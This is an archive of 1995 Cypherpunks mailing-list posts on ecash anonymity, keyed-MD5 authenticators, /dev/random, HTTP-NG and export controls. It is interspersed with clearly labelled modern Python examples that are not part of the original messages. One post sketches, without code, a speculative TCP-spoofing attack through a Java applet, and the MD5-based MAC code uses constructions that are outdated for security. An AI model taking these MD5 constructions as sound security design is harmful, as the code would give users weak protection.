[Short response, because I'm at home. More details tomorrow ]

On Tue, 31 Oct 1995 hallam@w3.org wrote:

> 
> >How are you going to handle mechanism negotiation?
> This is a must do item, Simon is having to do >lots< of this.

Just to clarify: one of the most important parts of the design is the
negotiation mechanism, so a lot of effort has gone into these mechanisms.
The aim is to _not_ have to do lots of RTT negotiations through the use of
caching and dynamic profiling. The negotiation facilities in HTTP 1.0 are not
used, not because there isn't a need for them, but because they don't 
offer sufficient power, and are much too inefficient. 

Oh, and when I say dynamic profiling, I'm referring to semi-standard 
profiles that can be obtained over the network, not to OSI style 
dead-trees. Deriving negotiated feature sets from a profile works really 
well for applications like the WEB, as a vast amount of this information 
remains the same for all copies of a particular version of a Browser. For 
example, all copies of hotjava support html 1.0, some netscape 
extensions, and can handle inline gifs, but not inline jpegs; alpha 
hotjava supports the alpha applet API. 

Simon
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 Nov 1995 10:13:28 +0800
To: "Martin Diehl" <mdiehl@dttus.com>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199511010149.RAA04458@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 17:19 10/31/95 -0600, Martin Diehl wrote:
>     2. When doing time domain measurements (Hewlett Packard had some good 
>     application notes on this subject), you must consider base clock 
>     jitter.  I'll try to illustrate with a diagram:
>     
>     actual event:            V                    V
>     clock granularity:  /...../...../...../...../...../...../
>     
>     the problem is that no matter how small the basic clock unit is 
>     (symbolized by "/", above), you can't be sure how much of that unit 
>     has passed when the event (symbolized by "V", above) occurs.  For 
>     example, on the original IBM PC, clock interrupts occurred about 18.2 
>     times per second (55ms interval).  In that architecture, you can't 
>     time an event and have an uncertainty of less than 2 times 55ms

Ah, but there is a neat hack that works well if you can dedicate the whole
processor to doing the timing.  This works with systems that do not have
preemptive multi-tasking.  (Getting it to work with preemptive
multi-tasking is a harder exercise).  Credit where credit is due, I first
saw this technique used, probably in 1968, on the IBM/360 (60HZ clock) with
a pair of programs called PACER and RATER.

Monitor the clock location.  (It doesn't matter whether it is incremented by
hardware or software.)  Run a timing loop from when it changes until it
changes again and count the number of times through the loop.  Then use the
same timing loop and count how many times the loop runs from a clock tick
to the event of interest (or from the event of interest to the next clock
tick).  Use the ratio of the two counts to interpolate between the times
you can get from the clock.

You have used the processor's instruction rate to synthesize a better clock.

Bill
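
[Added example, not part of Bill Frantz's message: the counted-loop
interpolation he describes, run on a constructed simulated machine so the
result is deterministic. SimulatedMachine, calibrate and time_event are
hypothetical names; on real hardware the calibration and measurement loops
must be the identical instruction sequence, with nothing preempting them.]

```python
"""Interpolating between coarse clock ticks with a counted timing loop."""


class SimulatedMachine:
    """Constructed stand-in for a CPU whose only clock is a coarse tick counter.

    Each step() is one pass through the timing loop and costs one cycle; the
    visible clock changes only once every cycles_per_tick cycles.
    """

    def __init__(self, cycles_per_tick, event_cycle, start_cycle=0):
        self.cycles_per_tick = cycles_per_tick
        self.event_cycle = event_cycle  # cycle at which the event happens
        self.cycle = start_cycle

    def step(self):
        self.cycle += 1

    def clock(self):
        """The only time source the program is allowed to read."""
        return self.cycle // self.cycles_per_tick

    def event_seen(self):
        return self.cycle >= self.event_cycle


def wait_for_tick(m):
    """Spin until the coarse clock changes, so counting starts on a tick edge."""
    start = m.clock()
    while m.clock() == start:
        m.step()
    return m.clock()


def calibrate(m):
    """Count timing-loop passes across one whole tick (edge to edge)."""
    tick = wait_for_tick(m)
    loops = 0
    while m.clock() == tick:
        m.step()
        loops += 1
    return loops


def time_event(m, loops_per_tick):
    """Return the event time in ticks, including the fraction of the last tick."""
    tick, loops = wait_for_tick(m), 0
    if m.event_seen():
        raise RuntimeError("event happened before the loop was aligned to a tick")
    while not m.event_seen():
        m.step()
        loops += 1
        now = m.clock()
        if now != tick:          # a new tick began: restart the fractional count
            tick, loops = now, 0
    return tick + loops / loops_per_tick


def demo():
    # Constructed scenario: 1000 loop passes per tick, event at cycle 5437.
    m = SimulatedMachine(cycles_per_tick=1000, event_cycle=5437, start_cycle=123)
    loops_per_tick = calibrate(m)
    interpolated = time_event(m, loops_per_tick)
    return loops_per_tick, m.clock(), interpolated


if __name__ == "__main__":
    lpt, coarse, fine = demo()
    print(f"loops per tick: {lpt}, coarse clock: {coarse}, interpolated: {fine:.3f}")
```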






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 6 Nov 1995 19:12:24 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ecash remailer
Message-ID: <199511010018.SAA06259@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>Hal writes:
>[suggesting a problem with Ed the Currency Cleaner]
>> What about this, though: Alice did not mean to pay Bob, but rather
>> Charlie, and Bob stole the coins.  He launders them through Ed's
>> service.  Charlie never got the cash, and Alice complains to the bank
>> that the coins were stolen.  The bank says, fine, we can identify the
>> perpetrator, let's see... it's Ed.  Ed is now charged with theft and
>> has an expensive and uncertain legal experience ahead of him.
>
>Jumping in hastily:
>
>It seems to me that Ed faces a larger problem if the above scenario turns
>out to be a viable attack. Consider the following sequence: Alice and
>Charlie decide to get some (payee-anonymous) currency laundromat in hot 
>water. Alice (payer-anonymously) washes some coins at the laundromat.
>Con-man Charlie claims he didn't get paid for some fictional transaction with
>Alice. Alice complains to the bank, and the rest proceeds as before. The
>Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
>situation from the bank's perspective.
>

Wouldn't the ability to have the bank prove that the coins were 'cashed'
make this all null and void? The only way this would work would be if
Charlie is willing to completely forego cashing in the coins, *ever*. Should
he cash them in later, Ed would seem to have grounds for suspicion/complaint.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 2 Nov 1995 18:47:33 +0800
To: cypherpunks@toad.com
Subject: PRL_har
Message-ID: <199510312321.SAA05260@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Ito has shared an LA Times report of October 21 on frantic
   Japanese economic espionage, there and in the US, and its
   booming bugging and wiretapping industry.

   And The Wash Post simpers today about the CIA-Mils self-
   sucking into the eco-spy quagmire to garner funds, as spit
   in its toon yesterday.

   More non-crypto: FinTimes jabbers today in "Cars safe from
   phone threat," on the weird effects on automobile
   "electronic-based safety-critical systems" of pervasive
   sources of electro-magnetic interference, say by your
   mobile phone or police transceivers, that may catapult
   the family-fun Land Rover into Rancid's roadbus.


   PRL_har  (3 all 15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 1 Nov 1995 10:10:09 +0800
To: cypherpunks@toad.com
Subject: There is still no perfectly anonymous currency
Message-ID: <199511010127.SAA22368@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

It occurs to me that even in an on-line-cleared system, that a 
collusion of Ursula the Underwriter and Bob the Payer can identify 
Alice the Payee by traffic analysis based on time constraints.  Alice
has to turn in the coin that Bob gave her in order to get it on-line-
cleared *before* she can close the deal with Bob assuming that she 
believes there is a chance Bob's coin is bad (pre-spent).  So Bob 
and Ursula can do some simple traffic-analysis-style coin-watching 
over the course of several transactions between Bob and Alice.


This could become infeasible for Bob and Ursula in the case that
there are very many such transactions going on at the same time and
Alice (and some of the other payees) prudently add a traffic-analysis-
foiling delay between acceptance of Bob's coin and turning it over 
to the bank, and between receiving confirmation from the bank and 
letting Bob know that the bank said "OK".  (Of course all this, and 
in fact all conversations on this subject, presume the existence and 
proper usage of identity-protecting communication protocols between 
Alice and Ursula and between Alice and Bob.)


Now in some applications it might be a problem for Alice to add
these delays.  (She might need to complete a great many transactions
in a limited amount of time.)  In this case Alice will have to
choose between efficiency and identity-protection.  Her tactic will
further be hampered by the fact that only Ursula knows how many
similar transactions are going on at any given time.  Alice will
have to guess.


In sum, I have still not seen a proposal for an electronic currency
scheme which ensures unconditional identity-protection for both payer 
and payee.  On the other hand, if a bank allows pseudonymous accounts,
or if coin-re-paying systems can be implemented, then some lesser 
degree of identity-protection is still attainable.  On the third 
hand, if a bank allows instant, cheap, anonymous accounts or, 
equivalently, if the bank issues coins in return (or as Tony Eng has
suggested, issues "deposit-vouchers" in return) instead of accessing
the payee's account, then ensuring unconditional identity-protection 
for both parties is easy under several protocols, including the 
Chaumian Ecash protocol.  
(That is:  auto-coin-laundering via an instant, one-use anonymous 
account that you control or via a new coin or a deposit voucher
whose blinding factors you chose.)



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJbM0vWZSllhfG25AQG1MgP/UhbGC2Afih+/hrQcjvc4lOQBAWXQ8lDL
HpMRI1002odcEQ3LX/Dy2H7+LwsnMQweVtQU3Q9Q8cVWOeSXSReoKAZinbjAvvfH
Hf7xKZcmgX4xBhRmOeLxH2/noGL5iRkjONuMfQUFE85Rkc3ilh7IQr+UC8sGLUY1
2p/tXgsFJbM=
=RzYl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 09:43:29 +0800
To: "baldwin" (Robert W. Baldwin) <baldwin@rsa.com>
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9509308151.AA815103202@snail.rsa.com>
Message-ID: <199511010004.TAA14640@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"baldwin" writes:
> Simon,
>         There are a few different ways to add key material to MD5 to
> make it suitable as a shared-secret authenticator function.  Some of these
> are less resistant to attacks than others.  For example, the keyed MD5
> mechanism that is part of the current IPsec specifications can be
> attacked using 2**60 chosen messages.  Fortunately, the IPsec specs
> also require that the shared MD5 key be changed every 2**32 messages,
> so this attack is unlikely to succeed.  Specifically, IPsec uses
> MD5 as follows:  X = MD5(key | keypad | Message), where "|" means
> concatenation and the "keypad" pads out the key to 512 bits.
> Basically, this function is the same as standard MD5 with a
> different initialization vector for the compression operation
> on the first block of the message.
>         RSA Labs recommends that people use an authenticator like
> X = MD5(key1, MD5(key2, Message)).  This resists the chosen plaintext
> attacks that were published at the crypto conference in Spring 1995.

Pardon me. The amount of vitriol I am going to spew is probably
difficult for people to understand because most folks around here
weren't following the keyed MD5 discussions during the IPSEC work and
have no idea of the sort of crap the professional cryptographic
community put us through.

We spent months, and months, and months, and months, getting advice
from every cryptographer on the planet. Every conceivable combination
of pads, multiple keys, keys before the text, after, before and after,
etc., was discussed over and over and over again.

Finally, the folks at RSA and IBM both agreed that Hugo's scheme, the
one we were putting into place, was the best possible one. (That's the
one with the padded key.)

What the flying hell are you doing telling us now, and indeed not even
telling the IPSEC community but instead mumbling on cypherpunks, that
you guys were in possession of information BEFORE the entire
discussion in midsummer that indicated that your own advice was wrong?

Perry
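
[Added example, not part of the original message and not code from the IPsec
drafts or RSA Labs: the two keyed-MD5 constructions quoted above, written out
side by side. Assumptions: the "keypad" is zero bytes, the comma in
MD5(key1, MD5(key2, Message)) means concatenation, and all function and
class names are hypothetical.]

```python
"""The two keyed-MD5 authenticators from the quoted text, for comparison."""
import hashlib
import hmac

BLOCK = 64  # MD5 compresses 512-bit (64-byte) blocks


def new_md5(data=b""):
    """MD5 object; flagged non-security so FIPS-restricted builds still allow it."""
    try:
        return hashlib.md5(data, usedforsecurity=False)
    except TypeError:  # Python older than 3.9 has no such keyword
        return hashlib.md5(data)


def pad_key(key):
    """key | keypad: fill the key out to one full 512-bit block.

    Assumption: zero padding. The quoted text only says the pad fills 512 bits.
    """
    if len(key) > BLOCK:
        raise ValueError("key longer than one MD5 block")
    return key + b"\x00" * (BLOCK - len(key))


def prefix_mac(key, message):
    """X = MD5(key | keypad | Message), computed in one shot."""
    return new_md5(pad_key(key) + message).digest()


class RekeyRequired(Exception):
    """Raised when a key has authenticated its allowed number of messages."""


class KeyedState:
    """Same authenticator, using the observation in the quoted text: the padded
    key occupies exactly the first block, so compressing it once yields a
    key-dependent chaining value that every message can start from."""

    def __init__(self, key, limit=2**32):
        self._state = new_md5(pad_key(key))  # key block compressed once
        self._left = limit                   # quoted rekey rule: 2**32 messages

    def mac(self, message):
        if self._left <= 0:
            raise RekeyRequired("message limit reached; change the shared key")
        self._left -= 1
        h = self._state.copy()               # start from the keyed state
        h.update(message)
        return h.digest()


def nested_mac(key1, key2, message):
    """X = MD5(key1, MD5(key2, Message)) with "," read as concatenation."""
    inner = new_md5(key2 + message).digest()
    return new_md5(key1 + inner).digest()


def verify(expected_tag, received_tag):
    """Compare tags in constant time so the check itself leaks nothing."""
    return hmac.compare_digest(expected_tag, received_tag)


if __name__ == "__main__":
    key, msg = b"constructed-shared-secret", b"constructed message body"
    print("prefix :", prefix_mac(key, msg).hex())
    print("cached :", KeyedState(key).mac(msg).hex())
    print("nested :", nested_mac(b"constructed-k1", b"constructed-k2", msg).hex())
```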




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 09:49:27 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311648.IAA05877@orac.engr.sgi.com>
Message-ID: <199511010026.TAA22659@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> One problem with this scheme is that if multiple processes have
> /dev/random open you can block unexpectedly.  If I try to avoid blocking
> by first checking if entropy is available there's a race condition if
> another process reads from the device.  Is there another way to avoid
> blocking?

Yeah. Use non-blocking I/O. It's in every version of Unix I've touched
for over a decade.

.pm
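
[Added example, not part of the original message and not the driver's own
code: a non-blocking read in place of the check-then-read sequence whose race
is described above. It assumes the device honours O_NONBLOCK; the function
names are hypothetical, and the demo uses a constructed pipe as a stand-in
so that it runs anywhere.]

```python
"""Reading an entropy device without ever sleeping inside read()."""
import os
import select
import time


def open_nonblocking(path="/dev/random"):
    """Open the device so read() fails with EAGAIN instead of sleeping."""
    return os.open(path, os.O_RDONLY | os.O_NONBLOCK)


def read_available(fd, want):
    """One read attempt.

    Returns the bytes available right now (possibly fewer than `want`),
    b"" on end-of-file, or None if the read would have blocked. There is no
    separate "is entropy available?" check for another reader to race with:
    the read itself is the check.
    """
    try:
        return os.read(fd, want)
    except BlockingIOError:
        return None


def gather(fd, want, timeout):
    """Collect up to `want` bytes, waiting at most `timeout` seconds in total.

    Short reads are normal for an entropy device, so keep asking for the
    remainder. The caller must check the returned length and decide what a
    shortfall means; never pad it out with weaker data silently.
    """
    deadline = time.monotonic() + timeout
    out = bytearray()
    while len(out) < want:
        chunk = read_available(fd, want - len(out))
        if chunk:                       # got some bytes, ask for the rest
            out += chunk
            continue
        if chunk == b"":                # end-of-file: nothing more will come
            break
        remaining = deadline - time.monotonic()
        if remaining <= 0:              # would block and we are out of time
            break
        select.select([fd], [], [], remaining)  # sleep here, bounded, not in read()
    return bytes(out)


def demo():
    # Constructed stand-in for the device: a pipe that a second party drains
    # or fills independently of us.
    r, w = os.pipe()
    os.set_blocking(r, False)
    empty = read_available(r, 16)       # nothing there: None, not a hang
    os.write(w, b"\x13\x37\xc0")        # only 3 bytes become available
    got = gather(r, 8, timeout=0.05)    # asks for 8, returns the 3 it could get
    os.close(r)
    os.close(w)
    return empty, got


if __name__ == "__main__":
    print(demo())
```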




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 4 Nov 1995 04:02:55 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.90.951031201550.9466A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Ahh yes, but Ed would not spend those coins, he would use them to
launder other people's coins such that any person laundering coins through
Ed may randomly get a coin, even Alice and Charlie! What's the bank to do
when they see the coins being spent by a few hundred different people?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 31 Oct 1995, Futplex wrote:

> Jumping in hastily:
> 
> It seems to me that Ed faces a larger problem if the above scenario turns
> out to be a viable attack. Consider the following sequence: Alice and
> Charlie decide to get some (payee-anonymous) currency laundromat in hot 
> water. Alice (payer-anonymously) washes some coins at the laundromat.
> Con-man Charlie claims he didn't get paid for some fictional transaction with
> Alice. Alice complains to the bank, and the rest proceeds as before. The
> Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
> situation from the bank's perspective.
> 
> -Futplex <futplex@pseudonym.com>
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 1 Nov 1995 10:07:46 +0800
To: Filtered Cypherpunks List <cypherpunks@toad.com
Subject: From Bill Frezza: Electronic Warfare
Message-ID: <Pine.SUN.3.91.951031203959.1181A-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sun, 29 Oct 1995 11:33:54 -0500
From: Bill Frezza <frezza@interramp.com>
To: sunder@escape.com
Subject: Can you post this?

Ray,

If you feel it is appropriate, can you post the attached column to
cypherpunks? Since I am not a regular subscriber (I can't keep up with the
traffic) I thought it would be best to pass it by you first.

Thanks,

Bill Frezza
------------------------------------------------------------------------------
To: Cypherpunks@toad.com
Subject: Electronic Warfare
From: Bill Frezza (frezza@interramp.com)

Dear cypherpunks,

Attached is a column that will appear on the op-ed page of tomorrow's
(10/30) Communications Week that was stimulated largely by a report filed
here by one of your members. I thought you would find it interesting and
thought provoking. I would like to thank and acknowledge whoever it was
that filed that report as well as encourage you all to keep me informed
about related political developments. (I just don't have the bandwidth to
follow the cypherpunks list in its entirety.)  It is my hope to bring the
important issues you raise here to the attention of the industry and the
general public.

Regards,

Bill Frezza
Communications Week

ELECTRONIC WARFARE WAGES ON - AND YOU'RE THE TARGET

Although the flap over the Clinton administration's attempt to promote
escrowed-key encryption systems like Clipper has temporarily faded, the war
on electronic privacy continues.   As proceedings at the Fourth
International Conference on Money Laundering, Forfeiture, Asset Recovery,
Offshore Investments, the Pacific Rim, and International Financial Crimes
reveal, there has been no let up in our government's efforts to blockade
the cyber-frontier.

No, you won't learn much from the Wall Street Journal or the New York
Times, written by journalist-generalists who have no clue about where this
technology is heading.  The Feds have become so skilled at manipulating the
Old Media that stories about electronic privacy  invariably center on the
latest drug kingpin, pedophile, or domestic terrorist.  Attacking these
universally abhorred enemies of the people not only makes for good
headlines but keeps privacy advocates off balance as they are forced to
defend abstract rights using loathsome examples.  But if you tune in to the
Cypherpunks mailing list (majordomo@toad.com) you can get some excellent
first hand reports from the front.

In the relatively short period since the passage of the Bank Secrecy Act,
which, among other things, obliges banks to file Suspicious Activity
Reports on its customers, banks have become virtual deputies in the
treasury department's war on uncontrolled financial transactions.  And this
war is increasingly spilling into cyberspace.

The conference underscored the fact that, paradoxically, we are heading not
toward more specific and well defined transaction monitoring regulations,
but less.  How so?  The problem with making regulations precise is that
what software algorithms can define, other algorithms can evade.  Instead,
regulation by "raised eyebrow" is becoming the norm.  Federal bank
examiners have been given significant latitude to invoke draconian
penalties against uncooperative banks.  Because bank officers have few
due-process protections under this regime, it is no surprise that most of
them have become sniveling toadies.  The objective is to insure that banks
"voluntarily" introduce even more aggressive, unpredictable, and intrusive
monitoring than the government would ever dare mandate.  And to make sure
nothing slips through the cracks, human surveillance will be supplemented
with artificial-intelligence agents that can perform pattern analysis on
the aggregate flow of electronic transactions, flagging anything remotely
suspicious.  George Orwell would be impressed.

Lest you think that all of this is motivated solely by the drug war,  a
visit to the Treasury Department's Financial Crimes Enforcement Network
(FinCEN) homepage
(http://www.ustreas.gov/treasury/bureaus/fincen/facts.html) should open
your eyes.  This battle is not just about drug prohibition, a crime the
Treasury Department would have to invent if it didn't already exist.  The
real struggle is about the future of tax compliance, and it has you in its
sights.

A famous Revolutionary War era pamphleteer, writing under the pseudonym
"Brutus", perhaps said it best 200 years ago when he wrote - "The national
government through its taxing power will introduce itself into every corner
of the city and country.  It will take cognizance of the professional man
in his office or his study;  it will watch the merchant in his store;  it
will follow the mechanic to his shop and his work, and will haunt him in
his family and his bed;  it will be the constant companion to the
industrious farmer in his labour;  it will penetrate into the most obscure
cottage;  and finally it will light upon the head of every person in the
United States.  To all these different classes of people and in all these
circumstances on which it will attend them, the language in which it will
address them will be GIVE! GIVE!"

What Brutus didn't know and what the cypherpunks foresee is that one day
strong encryption will make it impossible to spy on our activities in
cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get
a lot hotter as the government spinmeisters labor to keep us focused on
public enemies while frantically trying to keep its hand in every citizen's
pocket and its eyes on every bankbook.

# # #
COPYRIGHT CMP PUBLICATIONS 1995

Bill Frezza is president at Wireless Computing Associates and co-founder of
the online forum DigitaLiberty.  The opinions expressed are his own. Frezza
can be reached at frezza@interramp.com.

 ------------------------------------
| Wireless Computing Associates, Inc.
| 704 Stoney Hill Rd., Suite 155
| Yardley, PA 19067
| ph 215-321-0929, fax 215-321-0490
| urgent Email: frezza@radiomail.net
| bulk Email: frezza@interramp.com
 ------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 10:17:46 +0800
To: perry@piermont.com
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <199511010004.TAA14640@jekyll.piermont.com>
Message-ID: <9511010201.AA01860@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Ooops...

Just gone off and read the papers again. The Keyed MD5 proposal currently described 
in one of the drafts is indeed one of those that was suggested in the cryptobytes 
article. I remember reading another calling itself "Keyed MD5" at the time of the 
rumpus Perry referred to.

The response that had been communicated back was that the IP sec work was going to 
standard anyway despite the objections. The suggestion which had started people off 
was that of MAC_a(x) = MD5(a.x.a). Nobody ever mentioned that IP sec had changed the 
construction (which is a good thing).

The point still stands however that there will have to be more than one algorithm 
supported and that HTTP-NG cannot assume that a particular algorithm or construction 
will be used. Keyed-MD5 is still an MD5 variant, there are good reasons to think that 
a keyed digest could be constructed which would be faster than a hash function.  

	Phill
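
The point above about supporting more than one MAC construction, as an added example that is not part of the original message or of any HTTP-NG or IP sec draft: a verifier that takes the construction from a label on the tag, restricts it to a receiver-side allow-list, and binds the label into the MAC input. The `alg:hex` tag format, the labels, the sample key and message, and the use of HMAC as the alternative construction are assumptions made for illustration.

```python
import hashlib
import hmac


def envelope_md5(key: bytes, msg: bytes) -> bytes:
    """MAC_a(x) = MD5(a . x . a), the construction named in the message."""
    return hashlib.md5(key + msg + key).digest()


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    """HMAC over MD5. HMAC is not named in the thread (assumption)."""
    return hmac.new(key, msg, hashlib.md5).digest()


def hmac_sha256(key: bytes, msg: bytes) -> bytes:
    """A second underlying hash, to show the registry is not MD5-specific."""
    return hmac.new(key, msg, hashlib.sha256).digest()


# Registry of constructions the code can compute (labels are hypothetical).
MAC_ALGORITHMS = {
    "envelope-md5": envelope_md5,
    "hmac-md5": hmac_md5,
    "hmac-sha256": hmac_sha256,
}

# Receiver policy: what this endpoint is willing to accept. The old
# construction stays computable but is not accepted.
POLICY = frozenset({"hmac-md5", "hmac-sha256"})

# Constructed sample values.
KEY = b"constructed-shared-secret"
MESSAGE = b"GET /index.html"


def _bind(alg: str, msg: bytes) -> bytes:
    # Authenticate the label together with the message so a tag made under
    # one construction cannot be presented under another label.
    return alg.encode("ascii") + b"\x00" + msg


def make_tag(alg: str, key: bytes, msg: bytes) -> str:
    """Return the tag as 'alg:hexdigest'."""
    digest = MAC_ALGORITHMS[alg](key, _bind(alg, msg))
    return alg + ":" + digest.hex()


def verify_tag(tagged: str, key: bytes, msg: bytes, allowed) -> bool:
    """Check a tag, accepting only constructions in the receiver's allow-list."""
    alg, sep, hexdigest = tagged.partition(":")
    if not sep or alg not in allowed or alg not in MAC_ALGORITHMS:
        return False  # unknown or disallowed construction: refuse, never guess
    try:
        received = bytes.fromhex(hexdigest)
    except ValueError:
        return False
    expected = MAC_ALGORITHMS[alg](key, _bind(alg, msg))
    return hmac.compare_digest(expected, received)  # constant-time compare


if __name__ == "__main__":
    for name in MAC_ALGORITHMS:
        tag = make_tag(name, KEY, MESSAGE)
        print(name, "accepted" if verify_tag(tag, KEY, MESSAGE, POLICY) else "refused")
```

The same key and message give unrelated tags under each construction, so the receiver has to learn which one was used, and the allow-list is what stops a sender from falling back to the weakest construction the code still implements.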




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 10:28:30 +0800
To: cypherpunks@toad.com
Subject: Re: Please send cash
In-Reply-To: <9510312359.AA21087@all.net>
Message-ID: <9511010212.AA30561@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


> While HotJava prevents applets from actively opening connections that
> violate the user-selected security policy, it allows an applet to accept
> connections from anywhere.  At this point, an applet only has to use any one
> of a number of channels to communicate where it is, and have the remote end
> do the active open.

What if I start a Java applet then send it a faked TCP/IP packet from another 
host? Can I hotwire an outgoing connection that appears to be from the victim 
host?

TCP/IP connections are not really all that directed. It is only the startup 
phase that is truly directed - someone has to start a conversation.

Planned sequence of events :

Mallet:
	Send out Java applet to Alice
	Send Bob a connection request packet on port 22
	Alice's Java applet is accepting connections.
	Send Alice a "request" packet claiming to come from port 22
	Should now have an outgoing connection.

???? I'm not a TCP/IP hacker (much). I'll ask our guru tomorrow after we
are done with the NSA.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 1 Nov 1995 13:34:48 +0800
To: Dave Del Torto <ddt@digicash.com>
Subject: Re: W3 Self-Regulation?
In-Reply-To: <v03003912acbc72d1d4cf@[129.46.82.80]>
Message-ID: <Pine.SOL.3.91.951031205913.1396A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Dave Del Torto wrote:

> [Where's Tipper when you need her? Answer:]

Hey! Lay off the divine Ms. G!

There's actually a big difference between labelling and censorship, 
though there's always the danger that once material has been labelled, 
Ralph Reed and his merry gang of cross burners will try to ban 
information bearing certain labels (the ol' gateway effect).

Of course, if the labeling information isn't signed, then it's useless. 
Oh, and if people vote on labels, you really, really need secret voting 
protocols; this information can be very sensitive if it can be tied back 
to the voters.

Simon
p.s.
 What if instead of approving or banning drugs, the FDA instead just 
issued labels, and left the choices to the customer and his or her 
insurance agency...

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 10:48:37 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <199511010030.QAA09462@jobe.shell.portal.com>
Message-ID: <9511010221.AA01918@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner <sjb@universe.digex.net> writes:
>Dan Weinstein writes:
[unknown writes:]
>>>If anyone from MIT is reading this, it would be a real public service to 
>>>put on a web site (a) what the system used for the release of PGP is 
>>>exactly and (b) what assurances (oral, written, names & dates) was 
>>>received from State/Commerce that this was legal.
>>
>>You are assuming that because the government has chosen not to
>>prosecute MIT that they will not prosecute anyone else.  This is a
>>faulty assumption, laws are not invalidated if they are not enforced,
>>only if they are repealed or overturned.

From what I have been told the NSA have never squeaked about the PGP server.
No correspondence whatsoever. But then again MIT has some pretty meaty
lawyers and never gives in to nuisance suits (they recently paid $2 million
to fight one). Besides I doubt the head of the CIA would be too happy with
the NSA if they went off beating up MIT. NCSA got pretty well beaten up however.

I think that at the moment they are far too wound up trying to hope the Zimmermann 
case goes away that they want to start another.

It's simply a bunch of bureaucrats looking to keep their jobs after the war. Each 
time someone in congress yelps more money for "defence" you get more of those 
people. They now have to justify their pay packet. Before too long someone will 
clue in on a way to save 150 million a year. Actually they have done already but 
it takes a while for things to happen. What do you expect? The US constitution 
